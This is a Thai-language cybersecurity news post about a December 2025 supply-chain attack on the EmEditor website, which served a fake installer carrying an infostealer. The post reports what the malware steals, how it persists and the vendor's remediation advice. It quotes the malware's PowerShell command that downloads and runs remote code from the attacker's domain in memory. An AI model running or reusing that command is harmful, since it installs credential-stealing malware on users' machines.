หน้าแรก ตรวจหวย เว็บบอร์ด ควิซ Pic Post แชร์ลิ้ง หาเพื่อน Chat หาเพื่อน Line Page อัลบั้ม คำคม Glitter เกมถอดรหัสภาพ คำนวณ การเงิน ราคาทองคำ กินอะไรดี
ข้อตกลงการใช้บริการนโยบายความเป็นส่วนตัวนโยบายเนื้อหานโยบายการสร้างรายได้About Usติดต่อเว็บไซต์แจ้งเนื้อหาไม่เหมาะสม
เว็บบอร์ด บอร์ดต่างๆค้นหาตั้งกระทู้

เว็บไซต์อย่างเป็นทางการของ EmEditor Editor ถูกแฮกเพื่อใช้เป็นฐานปล่อยมัลแวร์

เขียนโดย Annonymus TN

เว็บไซต์อย่างเป็นทางการของ EmEditor Editor ถูกแฮกเพื่อใช้เป็นฐานปล่อยมัลแวร์

 

การปล่อยมัลแวร์ใส่เหยื่อนั้นหลายครั้งมักจะเป็นการใช้วิธีการหลอกลวงแบบ Phishing เพื่อให้ดาวน์โหลดจากเว็บไซต์ปลอม แต่ในบางครั้งเว็บไซต์จริงก็อาจถูกแฮกเพื่อนำมาใช้ในการปล่อยมัลแวร์ได้เช่นกัน

 

จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบแคมเปญการโจมตีในรูปแบบ การโจมตีห่วงโซ่อุปทาน หรือ Supply Chain Attacks ผ่านทางการแฮกเว็บไซต์อย่างเป็นทางการของเครื่องมือแก้ไขข้อความยอดนิยม EmEditor Editor เพื่อปล่อยมัลแวร์ประเภทขโมยข้อมูลจากเครื่องของเหยื่อ หรือ Infostealer (ซึ่งแหล่งข่าวไม่ได้ระบุชื่อไว้) ด้วยการแฮกเพื่อเปลี่ยนเส้นทางการดาวน์โหลด (Download Path) จากไฟล์ดาวน์โหลดของแท้ ไปยังไฟล์ปลอมที่มีการสอดแทรกมัลแวร์ไว้แทน ซึ่งการแจ้งเตือนเรื่องแคมเปญดังกล่าวนั้นมาจากทางบริษัทผู้พัฒนา EmEditor Editor เอง โดยทางบริษัทได้แจ้งเตือนว่า การแฮกเกิดขึ้นระหว่างวันที่ 19 - 22 ธันวาคม ค.ศ. 2025 (พ.ศ. 2568) ที่ผ่านมา ซึ่งนับระยะเวลาเพียงแค่ 4 วันเท่านั้น แต่ใน 4 วันนี้ผู้ที่ดาวน์โหลด EmEditor Editor เวอร์ชัน 25.4.3 ผ่านทางปุ่ม Download Now ที่อยู่บนเว็บไซต์ ถือว่าเป็นผู้อยู่ใต้ความเสี่ยง เนื่องจากไฟล์ที่ดาวน์โหลดไปนั้นเป็นแอปพลิเคชันปลอม

 

โดยไฟล์แอปพลิเคชันปลอมดังกล่าวนั้น รูปร่างหน้าตาของไฟล์ติดตั้งจะดูเหมือนกับไฟล์ติดตั้งของแท้มากจนแทบแยกไม่ออก แต่ลายเซ็นดิจิทัล (Digital Signature) ที่อยู่บนตัวไฟล์นั้น แทนที่จะเป็นของทางบริษัท กลับเป็นของบริษัทที่ไม่มีที่มาที่ไปอย่าง “WALSHAM INVESTMENTS LIMITED” แทน ทำให้เป็นจุดสังเกตที่มองเห็นได้ชัดเจนว่าไฟล์ไหนจริง ไฟล์ไหนปลอม ซึ่งสำหรับไฟล์ติดตั้งนี้ ทางทีมวิจัยจาก Qianxin บริษัทผู้พัฒนาซอฟต์แวร์แอนตี้ไวรัสจากจีน ยังได้เผยอีกว่ามีการตรวจพบไฟล์มัลแวร์ (Payload) แบบ Infostealer ฝังตัว (Embeded) อยู่บนไฟล์ติดตั้งปลอมในรูปแบบโค้ด VBScript

 

ซึ่งโค้ดดังกล่าวนั้นจะถูกรันขึ้นมาระหว่างขั้นตอนการติดตั้ง ที่จะนำไปสู่การรันคำสั่ง PowerShell powershell.exe “irm emeditorjp.com | iex” ขึ้นมาโดยคำสั่งนี้จะนำไปสู่การรันโค้ดมัลแวร์ลงบนหน่วยความจำ (Memory) โดยตรง ทำให้เครื่องมือรักษาความปลอดภัยบนเครื่องส่วนมากมักจะไม่สามารถตรวจพบได้ เนื่องจากไม่เหลือไฟล์มัลแวร์ทิ้งไว้บนฮาร์ดดิสก์ให้ตรวจสอบ

 

มัลแวร์ที่ไม่ปรากฏชื่อตัวนี้นั้น มีความสามารถในการขโมยข้อมูลมากมาย โดยหลังจากติดตั้งนั้น มัลแวร์จะเริ่มทำการขโมยข้อมูลจากเว็บเบราว์เซอร์ Chrome, Edge, Brave, และ Opera ในทันที โดยข้อมูลจะครอบคลุมตั้งแต่ ไฟล์ Cookies, ข้อมูลการเข้าเว็บไซต์ต่าง ๆ, และข้อมูลการล็อกอิน แล้วจึงทำการเข้าบุกขโมยข้อมูลแอปพลิเคชันสำหรับการทำงานที่องค์กรต่าง ๆ นิยมใช้งาน เช่น Discord, Slack, Zoom, Microsoft Teams, WinSCP, และ PuTTY อีกด้วย ทำให้มัลแวร์ตัวนี้สามารถสร้างความเสียหายให้กับเหยื่อในระดับองค์กรธุรกิจได้อย่างมาก มากไปกว่านั้นตัวมัลแวร์ยังมีความสามารถในการขโมยรหัสเข้าใช้งานบัญชีโฆษณาบน Facebook, เข้าควบคุมข้อมูลบน Clipboard เพื่อขโมยข้อมูลเกี่ยวกับคริปโตเคอร์เรนซี และการสร้างการควบคุมจากระยะไกลเพื่อให้แฮกเกอร์สามารถเข้าขโมยข้อมูลเพิ่มเติมภายหลังได้

 

สำหรับในด้านการสร้างความคงทนของตัวมัลแวร์บนระบบ (Persistence) นั้น ตัวมัลแวร์จะใช้งานส่วนเสริม (Extension) ของเว็บเบราว์เซอร์ที่มีชื่อว่า “Google Drive Caching” ในการเข้าสู่เครื่องของเหยื่อโดยไม่ได้รับอนุญาตหลังจากที่ฝังตัวลงบนเครื่องได้สำเร็จ ซึ่งส่วนเสริมนี้จะมีฟีเจอร์ Domain Generation Algorithm ใช้ในการสร้างโดเมนเพื่อติดต่อกับเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) แบบค่าไม่คงที่ (Dynamic) ได้ ทำให้ตรวจสอบกวาดล้างได้ยากมาก

 

ทางบริษัทผู้พัฒนาได้แนะนำว่า ผู้ที่สงสัยว่าเครื่องติดมัลแวร์เรียบร้อยแล้วให้ทำการตัดอินเทอร์เน็ตในทันที แล้วเริ่มทำการสแกนกวาดล้างมัลแวร์ แล้วจึงทำการเปลี่ยนรหัสทุกอย่างที่มีบนเครื่องเพื่อความปลอดภัย

เนื้อหาโดย: Annonymus TN
⚠ แจ้งเนื้อหาไม่เหมาะสม 
Annonymus TN's profile
มีผู้เข้าชมแล้ว 22 ครั้ง
เขียนโดย Annonymus TN
นักข่าวสายอาชญากรรมไซเบอร์และเทคโนโลยี เชี่ยวชาญการรายงานภัยออนไลน์ เช่น มัลแวร์ การหลอกลวง และการใช้ AI ในทางผิด โดยนำเสนอข้อมูลที่ซับซ้อนให้เข้าใจง่าย กระชับ และตรงประเด็น เพื่อให้ผู้อ่านรู้ทันภัยดิจิทัลก่อนตกเป็นเ
เป็นกำลังใจให้เจ้าของกระทู้โดยการ VOTE และ SHARE
Hot Topic ที่น่าสนใจอื่นๆ
“หลุมดักรถถัง” ที่ชายแดน อวสาน T-59 เขมรจอดเดี้ยงที่ช่องจอมคนไทยใช้ Android หรือ iPhone มากกว่ากัน เปิดตัวเลขล่าสุด 2026ยันต์เสือสมิง 5 ยอด คืออะไร ? ทำไมตามความเชื่อจึงมีข้อห้ามที่ผู้สักควรรู้ครูเกษียณปี 2569 โรงเรียนไหนเยอะที่สุด เปิดข้อมูลล่าสุด พร้อมข้อจำกัดที่ต้องรู้TikTok ลบคลิปไทย 3.29 ล้านชิ้นวันนี้ พร้อมคู่มือครอบครัวและแคมเปญ #วัยทีนรู้ทัน 2569ป้าแม่ค้าไก่ทอดเศร้า!โจรขโมย จยย.พ่วงข้าง เครื่องมือทำมาหากินครอบครัว ตร.เร่งไล่กล้องพบหนีข้ามอำเภอ คาดได้ตัวเร็วๆนี้ส่องโพยวันพุธก่อนหวยออก! จับตาเลขซ้ำ 10 ปี มีตัวไหนน่าตาม 16 ก.ย. 69ป๊อกเด้งนับแต้มอย่างไร รู้จักวิธีคิดแต้ม 0–9 ป๊อก 8 ป๊อก 9 และความหมายของ “เด้ง” พร้อมแยกสูตรจริงกับความเชื่อเปิด 5 เกาะในไทยที่ต่างชาติไปมาก ที่สุด อันดับ 1 นักท่องเที่ยวทะลุหลายล้านคน!เปิด 5 ห้างที่เงินสะพัดมากที่สุดในไทย อันดับ 1 คนเดินวันละหลักแสนเปิด 5 สะพานแขวนยาวที่สุดในโลก ต้านลมพายุระดับไต้ฝุ่นได้ยังไงโดยไม่ขาด?เลขม้าสีหมอก 16/9/69 เปิดแนวทางเด่นบน 4-7 วิ่ง 4 และเด่นล่าง 0-8 วิ่ง 0 พร้อมเลข 2 ตัวครบชุด
Hot Topic ที่มีผู้ตอบล่าสุด
ทำไมป่วยแล้วอาหารไม่อร่อยเปิด 5 เกาะในไทยที่ต่างชาติไปมาก ที่สุด อันดับ 1 นักท่องเที่ยวทะลุหลายล้านคน!
กระทู้อื่นๆในบอร์ด มือถือ Gadget เทคโนโลยี
ตำนาน “โทรศัพท์มือถือเครื่องแรกของโลก” เปิดสเปกเมื่อ 43 ปีก่อน เทียบราคา iPhone ยุคปัจจุบันTikTok ลบคลิปไทย 3.29 ล้านชิ้นวันนี้ พร้อมคู่มือครอบครัวและแคมเปญ #วัยทีนรู้ทัน 2569เปิดตัวแล้ว! iPhone 18 Pro มาใหม่ พร้อม iPhone Duo รุ่นพับได้รุ่นแรกของ Apple ราคาเริ่มเกือบ 7 หมื่นบาทอำเภอไหนใช้ดาต้า 5G สูงที่สุด
ตั้งกระทู้ใหม่